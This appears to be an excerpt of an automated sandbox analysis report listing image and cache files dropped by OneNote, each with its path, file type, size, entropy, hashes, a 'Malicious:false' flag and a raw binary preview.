                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49224
                                                                                                                                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                                                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                                                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                                                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                                                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) @, numeric, rows 262223750, columns 0
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                                  Entropy (8bit):2.4938252486923767
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:ulXT/Rll/aarsylHnF/v/aRatl:KT/frs2I8X
                                                                                                                                                                                                                  MD5:B4A78536B2196ADAD22C927B9C65F7FA
                                                                                                                                                                                                                  SHA1:5D29BBA4C8F7C1461BE241BFF9A415253B6823CD
                                                                                                                                                                                                                  SHA-256:47057AE800CA1ED5ACA42A1D7BC5D2779BEB4DC0BEB5BB39092B1C2088C4B6B8
                                                                                                                                                                                                                  SHA-512:7AE088D73B2B7B52C7A29F395841ABB52B893228828B5F6096BFAA24DF4D43BCFD6F911D88D6797ABF7189977967075C2988F857EB96704F2D08960063CB69F9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.....7..........S...@...............z.......<+..x(.....@. ..............

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
